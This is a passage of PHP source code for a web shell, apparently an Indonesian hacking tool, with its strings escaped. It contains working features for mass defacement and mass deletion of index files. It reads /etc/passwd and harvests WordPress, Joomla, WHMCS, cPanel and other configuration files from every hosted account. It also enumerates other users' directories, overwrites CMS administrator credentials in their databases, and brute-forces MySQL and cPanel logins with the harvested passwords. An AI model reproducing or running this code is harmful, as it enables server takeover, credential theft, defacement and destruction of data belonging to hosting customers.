value='index.php' style='width: 450px;' height='10'><br>\r\n\t<font style='text-decoration: underline;'>Index File:</font><br>\r\n\t<textarea name='script' style='width: 450px; height: 200px;'>Hacked by </textarea><br>\r\n\t<input type='submit' name='start' value='Mass Deface' style='width: 100px;'>\r\n\t</form></center>\";\r\n\t}\r\n} elseif(\$_GET['do'] == 'mass_delete') {\r\n\tfunction hapus_massal(\$dir,\$namafile) {\r\n\t\tif(is_writable(\$dir)) {\r\n\t\t\t\$dira = scandir(\$dir);\r\n\t\t\tforeach(\$dira as \$dirb) {\r\n\t\t\t\t\$dirc = \"\$dir/\$dirb\";\r\n\t\t\t\t\$lokasi = \$dirc.'/'.\$namafile;\r\n\t\t\t\tif(\$dirb === '.') {\r\n\t\t\t\t\tif(file_exists(\"\$dir/\$namafile\")) {\r\n\t\t\t\t\t\tunlink(\"\$dir/\$namafile\");\r\n\t\t\t\t\t}\r\n\t\t\t\t} elseif(\$dirb === '..') {\r\n\t\t\t\t\tif(file_exists(\"\".dirname(\$dir).\"/\$namafile\")) {\r\n\t\t\t\t\t\tunlink(\"\".dirname(\$dir).\"/\$namafile\");\r\n\t\t\t\t\t}\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir(\$dirc)) {\r\n\t\t\t\t\t\tif(is_writable(\$dirc)) {\r\n\t\t\t\t\t\t\tif(file_exists(\$lokasi)) {\r\n\t\t\t\t\t\t\t\techo \"[<font color=lime>DELETED</font>] \$lokasi<br>\";\r\n\t\t\t\t\t\t\t\tunlink(\$lokasi);\r\n\t\t\t\t\t\t\t\t\$idx = hapus_massal(\$dirc,\$namafile);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif(\$_POST['start']) {\r\n\t\techo \"<div style='margin: 5px auto; padding: 5px'>\";\r\n\t\thapus_massal(\$_POST['d_dir'], \$_POST['d_file']);\r\n\t\techo \"</div>\";\r\n\t} else {\r\n\techo \"<center>\";\r\n\techo \"<form method='post'>\r\n\t<font style='text-decoration: underline;'>Folder:</font><br>\r\n\t<input type='text' name='d_dir' value='\$dir' style='width: 450px;' height='10'><br>\r\n\t<font style='text-decoration: underline;'>Filename:</font><br>\r\n\t<input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>\r\n\t<input type='submit' name='start' value='Mass Delete' style='width: 100px;'>\r\n\t</form></center>\";\r\n\t}\r\n} elseif(\$_GET['do'] == 'config') {\r\n\t\$etc = fopen(\"/etc/passwd\", \"r\");\r\n\t\$idx = mkdir(\"idx_config\", 0777);\r\n\t\$isi_htc = \"Options all\\nRequire None\\nSatisfy Any\";\r\n\t\$htc = fopen(\"idx_config/.htaccess\",\"w\");\r\n\tfwrite(\$htc, \$isi_htc);\r\n\twhile(\$passwd = fgets(\$etc)) {\r\n\t\tif(\$passwd == \"\" || !\$etc) {\r\n\t\t\techo \"<font color=red>Can't read /etc/passwd</font>\";\r\n\t\t} else {\r\n\t\t\tpreg_match_all('/(.*?):x:/', \$passwd, \$user_config);\r\n\t\t\tforeach(\$user_config[1] as \$user_idx) {\r\n\t\t\t\t\$user_config_dir = \"/home/\$user_idx/public_html/\";\r\n\t\t\t\tif(is_readable(\$user_config_dir)) {\r\n\t\t\t\t\t\$grab_config = array(\r\n\t\t\t\t\t\t\"/home/\$user_idx/.my.cnf\" => \"cpanel\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/.accesshash\" => \"WHM-accesshash\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/public_html/vdo_config.php\" => \"Voodoo\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/public_html/bw-configs/config.ini\" => \"BosWeb\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/public_html/config/koneksi.php\" => \"Lokomedia\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/public_html/lokomedia/config/koneksi.php\" => \"Lokomedia\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/public_html/clientarea/configuration.php\" => \"WHMCS\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/public_html/whm/configuration.php\" => \"WHMCS\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/public_html/whmcs/configuration.php\" => \"WHMCS\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/public_html/forum/config.php\" => \"phpBB\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/public_html/sites/default/settings.php\" => \"Drupal\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/public_html/config/settings.inc.php\" => \"PrestaShop\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/public_html/app/etc/local.xml\" => \"Magento\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/public_html/joomla/configuration.php\" => \"Joomla\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/public_html/configuration.php\" => \"Joomla\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/public_html/wp/wp-config.php\" => \"WordPress\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/public_html/wordpress/wp-config.php\" => \"WordPress\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/public_html/wp-config.php\" => \"WordPress\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/public_html/admin/config.php\" => \"OpenCart\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/public_html/slconfig.php\" => \"Sitelok\",\r\n\t\t\t\t\t\t\"/home/\$user_idx/public_html/application/config/database.php\" => \"Ellislab\");\r\n\t\t\t\t\tforeach(\$grab_config as \$config => \$nama_config) {\r\n\t\t\t\t\t\t\$ambil_config = file_get_contents(\$config);\r\n\t\t\t\t\t\tif(\$ambil_config == '') {\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\$file_config = fopen(\"idx_config/\$user_idx-\$nama_config.txt\",\"w\");\r\n\t\t\t\t\t\t\tfputs(\$file_config,\$ambil_config);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\t\t\r\n\t\t\t}\r\n\t\t}\t\r\n\t}\r\n\techo \"<center><a href='?dir=\$dir/idx_config'><font color=lime>Done</font></a></center>\";\r\n} elseif(\$_GET['do'] == 'jumping') {\r\n\t\$i = 0;\r\n\techo \"<pre><div class='margin: 5px auto;'>\";\r\n\t\$etc = fopen(\"/etc/passwd\", \"r\");\r\n\twhile(\$passwd = fgets(\$etc)) {\r\n\t\tif(\$passwd == '' || !\$etc) {\r\n\t\t\techo \"<font color=red>Can't read /etc/passwd</font>\";\r\n\t\t} else {\r\n\t\t\tpreg_match_all('/(.*?):x:/', \$passwd, \$user_jumping);\r\n\t\t\tforeach(\$user_jumping[1] as \$user_idx_jump) {\r\n\t\t\t\t\$user_jumping_dir = \"/home/\$user_idx_jump/public_html\";\r\n\t\t\t\tif(is_readable(\$user_jumping_dir)) {\r\n\t\t\t\t\t\$i++;\r\n\t\t\t\t\t\$jrw = \"[<font color=lime>R</font>] <a href='?dir=\$user_jumping_dir'><font color=gold>\$user_jumping_dir</font></a>\";\r\n\t\t\t\t\tif(is_writable(\$user_jumping_dir)) {\r\n\t\t\t\t\t\t\$jrw = \"[<font color=lime>RW</font>] <a href='?dir=\$user_jumping_dir'><font color=gold>\$user_jumping_dir</font></a>\";\r\n\t\t\t\t\t}\r\n\t\t\t\t\techo \$jrw;\r\n\t\t\t\t\tif(function_exists('posix_getpwuid')) {\r\n\t\t\t\t\t\t\$domain_jump = file_get_contents(\"/etc/named.conf\");\t\r\n\t\t\t\t\t\tif(\$domain_jump == '') {\r\n\t\t\t\t\t\t\techo \" => ( <font color=red>gabisa ambil nama domain nya</font> )<br>\";\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\tpreg_match_all(\"#/var/named/(.*?).db#\", \$domain_jump, \$domains_jump);\r\n\t\t\t\t\t\t\tforeach(\$domains_jump[1] as \$dj) {\r\n\t\t\t\t\t\t\t\t\$user_jumping_url = posix_getpwuid(@fileowner(\"/etc/valiases/\$dj\"));\r\n\t\t\t\t\t\t\t\t\$user_jumping_url = \$user_jumping_url['name'];\r\n\t\t\t\t\t\t\t\tif(\$user_jumping_url == \$user_idx_jump) {\r\n\t\t\t\t\t\t\t\t\techo \" => ( <u>\$dj</u> )<br>\";\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo \"<br>\";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif(\$i == 0) { \r\n\t} else {\r\n\t\techo \"<br>Total ada \".\$i.\" Kamar di \".gethostbyname(\$_SERVER['HTTP_HOST']).\"\";\r\n\t}\r\n\techo \"</div></pre>\";\r\n} elseif(\$_GET['do'] == 'auto_edit_user') {\r\n\tif(\$_POST['hajar']) {\r\n\t\tif(strlen(\$_POST['pass_baru']) < 6 OR strlen(\$_POST['user_baru']) < 6) {\r\n\t\t\techo \"username atau password harus lebih dari 6 karakter\";\r\n\t\t} else {\r\n\t\t\t\$user_baru = \$_POST['user_baru'];\r\n\t\t\t\$pass_baru = md5(\$_POST['pass_baru']);\r\n\t\t\t\$conf = \$_POST['config_dir'];\r\n\t\t\t\$scan_conf = scandir(\$conf);\r\n\t\t\tforeach(\$scan_conf as \$file_conf) {\r\n\t\t\t\tif(!is_file(\"\$conf/\$file_conf\")) continue;\r\n\t\t\t\t\$config = file_get_contents(\"\$conf/\$file_conf\");\r\n\t\t\t\tif(preg_match(\"/JConfig|joomla/\",\$config)) {\r\n\t\t\t\t\t\$dbhost = ambilkata(\$config,\"host = '\",\"'\");\r\n\t\t\t\t\t\$dbuser = ambilkata(\$config,\"user = '\",\"'\");\r\n\t\t\t\t\t\$dbpass = ambilkata(\$config,\"password = '\",\"'\");\r\n\t\t\t\t\t\$dbname = ambilkata(\$config,\"db = '\",\"'\");\r\n\t\t\t\t\t\$dbprefix = ambilkata(\$config,\"dbprefix = '\",\"'\");\r\n\t\t\t\t\t\$prefix = \$dbprefix.\"users\";\r\n\t\t\t\t\t\$conn = mysql_connect(\$dbhost,\$dbuser,\$dbpass);\r\n\t\t\t\t\t\$db = mysql_select_db(\$dbname);\r\n\t\t\t\t\t\$q = mysql_query(\"SELECT * FROM \$prefix ORDER BY id ASC\");\r\n\t\t\t\t\t\$result = mysql_fetch_array(\$q);\r\n\t\t\t\t\t\$id = \$result['id'];\r\n\t\t\t\t\t\$site = ambilkata(\$config,\"sitename = '\",\"'\");\r\n\t\t\t\t\t\$update = mysql_query(\"UPDATE \$prefix SET username='\$user_baru',password='\$pass_baru' WHERE id='\$id'\");\r\n\t\t\t\t\techo \"Config => \".\$file_conf.\"<br>\";\r\n\t\t\t\t\techo \"CMS => Joomla<br>\";\r\n\t\t\t\t\tif(\$site == '') {\r\n\t\t\t\t\t\techo \"Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>\";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo \"Sitename => \$site<br>\";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif(!\$update OR !\$conn OR !\$db) {\r\n\t\t\t\t\t\techo \"Status => <font color=red>\".mysql_error().\"</font><br><br>\";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo \"Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>\";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close(\$conn);\r\n\t\t\t\t} elseif(preg_match(\"/WordPress/\",\$config)) {\r\n\t\t\t\t\t\$dbhost = ambilkata(\$config,\"DB_HOST', '\",\"'\");\r\n\t\t\t\t\t\$dbuser = ambilkata(\$config,\"DB_USER', '\",\"'\");\r\n\t\t\t\t\t\$dbpass = ambilkata(\$config,\"DB_PASSWORD', '\",\"'\");\r\n\t\t\t\t\t\$dbname = ambilkata(\$config,\"DB_NAME', '\",\"'\");\r\n\t\t\t\t\t\$dbprefix = ambilkata(\$config,\"table_prefix = '\",\"'\");\r\n\t\t\t\t\t\$prefix = \$dbprefix.\"users\";\r\n\t\t\t\t\t\$option = \$dbprefix.\"options\";\r\n\t\t\t\t\t\$conn = mysql_connect(\$dbhost,\$dbuser,\$dbpass);\r\n\t\t\t\t\t\$db = mysql_select_db(\$dbname);\r\n\t\t\t\t\t\$q = mysql_query(\"SELECT * FROM \$prefix ORDER BY id ASC\");\r\n\t\t\t\t\t\$result = mysql_fetch_array(\$q);\r\n\t\t\t\t\t\$id = \$result[ID];\r\n\t\t\t\t\t\$q2 = mysql_query(\"SELECT * FROM \$option ORDER BY option_id ASC\");\r\n\t\t\t\t\t\$result2 = mysql_fetch_array(\$q2);\r\n\t\t\t\t\t\$target = \$result2[option_value];\r\n\t\t\t\t\tif(\$target == '') {\r\n\t\t\t\t\t\t\$url_target = \"Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>\";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\$url_target = \"Login => <a href='\$target/wp-login.php' target='_blank'><u>\$target/wp-login.php</u></a><br>\";\r\n\t\t\t\t\t}\r\n\t\t\t\t\t\$update = mysql_query(\"UPDATE \$prefix SET user_login='\$user_baru',user_pass='\$pass_baru' WHERE id='\$id'\");\r\n\t\t\t\t\techo \"Config => \".\$file_conf.\"<br>\";\r\n\t\t\t\t\techo \"CMS => Wordpress<br>\";\r\n\t\t\t\t\techo \$url_target;\r\n\t\t\t\t\tif(!\$update OR !\$conn OR !\$db) {\r\n\t\t\t\t\t\techo \"Status => <font color=red>\".mysql_error().\"</font><br><br>\";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo \"Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>\";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close(\$conn);\r\n\t\t\t\t} elseif(preg_match(\"/Magento|Mage_Core/\",\$config)) {\r\n\t\t\t\t\t\$dbhost = ambilkata(\$config,\"<host><![CDATA[\",\"]]></host>\");\r\n\t\t\t\t\t\$dbuser = ambilkata(\$config,\"<username><![CDATA[\",\"]]></username>\");\r\n\t\t\t\t\t\$dbpass = ambilkata(\$config,\"<password><![CDATA[\",\"]]></password>\");\r\n\t\t\t\t\t\$dbname = ambilkata(\$config,\"<dbname><![CDATA[\",\"]]></dbname>\");\r\n\t\t\t\t\t\$dbprefix = ambilkata(\$config,\"<table_prefix><![CDATA[\",\"]]></table_prefix>\");\r\n\t\t\t\t\t\$prefix = \$dbprefix.\"admin_user\";\r\n\t\t\t\t\t\$option = \$dbprefix.\"core_config_data\";\r\n\t\t\t\t\t\$conn = mysql_connect(\$dbhost,\$dbuser,\$dbpass);\r\n\t\t\t\t\t\$db = mysql_select_db(\$dbname);\r\n\t\t\t\t\t\$q = mysql_query(\"SELECT * FROM \$prefix ORDER BY user_id ASC\");\r\n\t\t\t\t\t\$result = mysql_fetch_array(\$q);\r\n\t\t\t\t\t\$id = \$result[user_id];\r\n\t\t\t\t\t\$q2 = mysql_query(\"SELECT * FROM \$option WHERE path='web/secure/base_url'\");\r\n\t\t\t\t\t\$result2 = mysql_fetch_array(\$q2);\r\n\t\t\t\t\t\$target = \$result2[value];\r\n\t\t\t\t\tif(\$target == '') {\r\n\t\t\t\t\t\t\$url_target = \"Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>\";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\$url_target = \"Login => <a href='\$target/admin/' target='_blank'><u>\$target/admin/</u></a><br>\";\r\n\t\t\t\t\t}\r\n\t\t\t\t\t\$update = mysql_query(\"UPDATE \$prefix SET username='\$user_baru',password='\$pass_baru' WHERE user_id='\$id'\");\r\n\t\t\t\t\techo \"Config => \".\$file_conf.\"<br>\";\r\n\t\t\t\t\techo \"CMS => Magento<br>\";\r\n\t\t\t\t\techo \$url_target;\r\n\t\t\t\t\tif(!\$update OR !\$conn OR !\$db) {\r\n\t\t\t\t\t\techo \"Status => <font color=red>\".mysql_error().\"</font><br><br>\";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo \"Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>\";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close(\$conn);\r\n\t\t\t\t} elseif(preg_match(\"/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/\",\$config)) {\r\n\t\t\t\t\t\$dbhost = ambilkata(\$config,\"'DB_HOSTNAME', '\",\"'\");\r\n\t\t\t\t\t\$dbuser = ambilkata(\$config,\"'DB_USERNAME', '\",\"'\");\r\n\t\t\t\t\t\$dbpass = ambilkata(\$config,\"'DB_PASSWORD', '\",\"'\");\r\n\t\t\t\t\t\$dbname = ambilkata(\$config,\"'DB_DATABASE', '\",\"'\");\r\n\t\t\t\t\t\$dbprefix = ambilkata(\$config,\"'DB_PREFIX', '\",\"'\");\r\n\t\t\t\t\t\$prefix = \$dbprefix.\"user\";\r\n\t\t\t\t\t\$conn = mysql_connect(\$dbhost,\$dbuser,\$dbpass);\r\n\t\t\t\t\t\$db = mysql_select_db(\$dbname);\r\n\t\t\t\t\t\$q = mysql_query(\"SELECT * FROM \$prefix ORDER BY user_id ASC\");\r\n\t\t\t\t\t\$result = mysql_fetch_array(\$q);\r\n\t\t\t\t\t\$id = \$result[user_id];\r\n\t\t\t\t\t\$target = ambilkata(\$config,\"HTTP_SERVER', '\",\"'\");\r\n\t\t\t\t\tif(\$target == '') {\r\n\t\t\t\t\t\t\$url_target = \"Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>\";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\$url_target = \"Login => <a href='\$target' target='_blank'><u>\$target</u></a><br>\";\r\n\t\t\t\t\t}\r\n\t\t\t\t\t\$update = mysql_query(\"UPDATE \$prefix SET username='\$user_baru',password='\$pass_baru' WHERE user_id='\$id'\");\r\n\t\t\t\t\techo \"Config => \".\$file_conf.\"<br>\";\r\n\t\t\t\t\techo \"CMS => OpenCart<br>\";\r\n\t\t\t\t\techo \$url_target;\r\n\t\t\t\t\tif(!\$update OR !\$conn OR !\$db) {\r\n\t\t\t\t\t\techo \"Status => <font color=red>\".mysql_error().\"</font><br><br>\";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo \"Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>\";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close(\$conn);\r\n\t\t\t\t} elseif(preg_match(\"/panggil fungsi validasi xss dan injection/\",\$config)) {\r\n\t\t\t\t\t\$dbhost = ambilkata(\$config,'server = \"','\"');\r\n\t\t\t\t\t\$dbuser = ambilkata(\$config,'username = \"','\"');\r\n\t\t\t\t\t\$dbpass = ambilkata(\$config,'password = \"','\"');\r\n\t\t\t\t\t\$dbname = ambilkata(\$config,'database = \"','\"');\r\n\t\t\t\t\t\$prefix = \"users\";\r\n\t\t\t\t\t\$option = \"identitas\";\r\n\t\t\t\t\t\$conn = mysql_connect(\$dbhost,\$dbuser,\$dbpass);\r\n\t\t\t\t\t\$db = mysql_select_db(\$dbname);\r\n\t\t\t\t\t\$q = mysql_query(\"SELECT * FROM \$option ORDER BY id_identitas ASC\");\r\n\t\t\t\t\t\$result = mysql_fetch_array(\$q);\r\n\t\t\t\t\t\$target = \$result[alamat_website];\r\n\t\t\t\t\tif(\$target == '') {\r\n\t\t\t\t\t\t\$target2 = \$result[url];\r\n\t\t\t\t\t\t\$url_target = \"Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>\";\r\n\t\t\t\t\t\tif(\$target2 == '') {\r\n\t\t\t\t\t\t\t\$url_target2 = \"Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>\";\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\$cek_login3 = file_get_contents(\"\$target2/adminweb/\");\r\n\t\t\t\t\t\t\t\$cek_login4 = file_get_contents(\"\$target2/lokomedia/adminweb/\");\r\n\t\t\t\t\t\t\tif(preg_match(\"/CMS Lokomedia|Administrator/\", \$cek_login3)) {\r\n\t\t\t\t\t\t\t\t\$url_target2 = \"Login => <a href='\$target2/adminweb' target='_blank'><u>\$target2/adminweb</u></a><br>\";\r\n\t\t\t\t\t\t\t} elseif(preg_match(\"/CMS Lokomedia|Lokomedia/\", \$cek_login4)) {\r\n\t\t\t\t\t\t\t\t\$url_target2 = \"Login => <a href='\$target2/lokomedia/adminweb' target='_blank'><u>\$target2/lokomedia/adminweb</u></a><br>\";\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\$url_target2 = \"Login => <a href='\$target2' target='_blank'><u>\$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>\";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\$cek_login = file_get_contents(\"\$target/adminweb/\");\r\n\t\t\t\t\t\t\$cek_login2 = file_get_contents(\"\$target/lokomedia/adminweb/\");\r\n\t\t\t\t\t\tif(preg_match(\"/CMS Lokomedia|Administrator/\", \$cek_login)) {\r\n\t\t\t\t\t\t\t\$url_target = \"Login => <a href='\$target/adminweb' target='_blank'><u>\$target/adminweb</u></a><br>\";\r\n\t\t\t\t\t\t} elseif(preg_match(\"/CMS Lokomedia|Lokomedia/\", \$cek_login2)) {\r\n\t\t\t\t\t\t\t\$url_target = \"Login => <a href='\$target/lokomedia/adminweb' target='_blank'><u>\$target/lokomedia/adminweb</u></a><br>\";\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\$url_target = \"Login => <a href='\$target' target='_blank'><u>\$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>\";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\t\$update = mysql_query(\"UPDATE \$prefix SET username='\$user_baru',password='\$pass_baru' WHERE level='admin'\");\r\n\t\t\t\t\techo \"Config => \".\$file_conf.\"<br>\";\r\n\t\t\t\t\techo \"CMS => Lokomedia<br>\";\r\n\t\t\t\t\tif(preg_match('/error, gabisa ambil nama domain nya/', \$url_target)) {\r\n\t\t\t\t\t\techo \$url_target2;\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo \$url_target;\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif(!\$update OR !\$conn OR !\$db) {\r\n\t\t\t\t\t\techo \"Status => <font color=red>\".mysql_error().\"</font><br><br>\";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo \"Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>\";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close(\$conn);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo \"<center>\r\n\t\t<h1>Auto Edit User Config</h1>\r\n\t\t<form method='post'>\r\n\t\tDIR Config: <br>\r\n\t\t<input type='text' size='50' name='config_dir' value='\$dir'><br><br>\r\n\t\tSet User & Pass: <br>\r\n\t\t<input type='text' name='user_baru' value='m3r1c4' placeholder='user_baru'><br>\r\n\t\t<input type='text' name='pass_baru' value='m3r1c4' placeholder='pass_baru'><br>\r\n\t\t<input type='submit' name='hajar' value='Submit' style='width: 100px;'>\r\n\t\t</form>\r\n\t\t<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>\r\n\t\t\";\r\n\t}\r\n} elseif(\$_GET['do'] == 'cpanel') {\r\n\tif(\$_POST['crack']) {\r\n\t\t\$usercp = explode(\"\\r\\n\", \$_POST['user_cp']);\r\n\t\t\$passcp = explode(\"\\r\\n\", \$_POST['pass_cp']);\r\n\t\t\$i = 0;\r\n\t\tforeach(\$usercp as \$ucp) {\r\n\t\t\tforeach(\$passcp as \$pcp) {\r\n\t\t\t\tif(@mysql_connect('localhost', \$ucp, \$pcp)) {\r\n\t\t\t\t\tif(\$_SESSION[\$ucp] && \$_SESSION[\$pcp]) {\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\$_SESSION[\$ucp] = \"1\";\r\n\t\t\t\t\t\t\$_SESSION[\$pcp] = \"1\";\r\n\t\t\t\t\t\tif(\$ucp == '' || \$pcp == '') {\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\$i++;\r\n\t\t\t\t\t\t\tif(function_exists('posix_getpwuid')) {\r\n\t\t\t\t\t\t\t\t\$domain_cp = file_get_contents(\"/etc/named.conf\");\t\r\n\t\t\t\t\t\t\t\tif(\$domain_cp == '') {\r\n\t\t\t\t\t\t\t\t\t\$dom = \"<font color=red>gabisa ambil nama domain nya</font>\";\r\n\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\tpreg_match_all(\"#/var/named/(.*?).db#\", \$domain_cp, \$domains_cp);\r\n\t\t\t\t\t\t\t\t\tforeach(\$domains_cp[1] as \$dj) {\r\n\t\t\t\t\t\t\t\t\t\t\$user_cp_url = posix_getpwuid(@fileowner(\"/etc/valiases/\$dj\"));\r\n\t\t\t\t\t\t\t\t\t\t\$user_cp_url = \$user_cp_url['name'];\r\n\t\t\t\t\t\t\t\t\t\tif(\$user_cp_url == \$ucp) {\r\n\t\t\t\t\t\t\t\t\t\t\t\$dom = \"<a href='http://\$dj/' target='_blank'><font color=lime>\$dj</font></a>\";\r\n\t\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\$dom = \"<font color=red>function is Disable by system</font>\";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo \"username (<font color=lime>\$ucp</font>) password (<font color=lime>\$pcp</font>) domain (\$dom)<br>\";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif(\$i == 0) {\r\n\t\t} else {\r\n\t\t\techo \"<br>Succes!\".\$i.\" Cpanel from <font color=lime>Allah SWT</font>\";\r\n\t\t}\r\n\t} else {\r\n\t\techo \"<center>\r\n\t\t<form method='post'>\r\n\t\tUSER: <br>\r\n\t\t<textarea style='width: 450px; height: 150px;' name='user_cp'>\";\r\n\t\t\$_usercp = fopen(\"/etc/passwd\",\"r\");\r\n\t\twhile(\$getu = fgets(\$_usercp)) {\r\n\t\t\tif(\$getu == '' || !\$_usercp) {\r\n\t\t\t\techo \"<font color=red>Can't read /etc/passwd</font>\";\r\n\t\t\t} else {\r\n\t\t\t\tpreg_match_all(\"/(.*?):x:/\", \$getu, \$u);\r\n\t\t\t\tforeach(\$u[1] as \$user_cp) {\r\n\t\t\t\t\t\tif(is_dir(\"/home/\$user_cp/public_html\")) {\r\n\t\t\t\t\t\t\techo \"\$user_cp\\n\";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\techo \"</textarea><br>\r\n\t\tPASS: <br>\r\n\t\t<textarea style='width: 450px; height: 200px;' name='pass_cp'>\";\r\n\t\tfunction cp_pass(\$dir) {\r\n\t\t\t\$pass = \"\";\r\n\t\t\t\$dira = scandir(\$dir);\r\n\t\t\tforeach(\$dira as \$dirb) {\r\n\t\t\t\tif(!is_file(\"\$dir/\$dirb\")) continue;\r\n\t\t\t\t\$ambil = file_get_contents(\"\$dir/\$dirb\");\r\n\t\t\t\tif(preg_match(\"/WordPress/\", \$ambil)) {\r\n\t\t\t\t\t\$pass .= ambilkata(\$ambil,\"DB_PASSWORD', '\",\"'\").\"\\n\";\r\n\t\t\t\t} elseif(preg_match(\"/JConfig|joomla/\", \$ambil)) {\r\n\t\t\t\t\t\$pass .= ambilkata(\$ambil,\"password = '\",\"'\").\"\\n\";\r\n\t\t\t\t} elseif(preg_match(\"/Magento|Mage_Core/\", \$ambil)) {\r\n\t\t\t\t\t\$pass .= ambilkata(\$ambil,\"<password><![CDATA[\",\"]]></password>\").\"\\n\";\r\n\t\t\t\t} elseif(preg_match(\"/panggil fungsi validasi xss dan injection/\", \$ambil)) {\r\n\t\t\t\t\t\$pass .= ambilkata(\$ambil,'password = \"','\"').\"\\n\";\r\n\t\t\t\t} elseif(preg_match(\"/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/\", \$ambil)) {\r\n\t\t\t\t\t\$pass .= ambilkata(\$ambil,\"'DB_PASSWORD', '\",\"'\").\"\\n\";\r\n\t\t\t\t} elseif(preg_match(\"/client/\", \$ambil)) {\r\n\t\t\t\t\tpreg_match(\"/password=(.*)/\", \$ambil, \$pass1);\r\n\t\t\t\t\tif(preg_match('/\"/', \$pass1[1])) {\r\n\t\t\t\t\t\t\$pass1[1] = str_replace('\"', \"\", \$pass1[1]);\r\n\t\t\t\t\t\t\$pass .= \$pass1[1].\"\\n\";\r\n\t\t\t\t\t}\r\n\t\t\t\t} elseif(preg_match(\"/cc_encryption_hash/\", \$ambil)) {\r\n\t\t\t\t\t\$pass .= ambilkata(\$ambil,\"db_password = '\",\"'\").\"\\n\";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo \$pass;\r\n\t\t}\r\n\t\t\$cp_pass = cp_pass(\$dir);\r\n\t\techo \$cp_pass;\r\n\t\techo \"</textarea><br>\r\n\t\t<input type='submit' name='crack' style='width: 100px;' 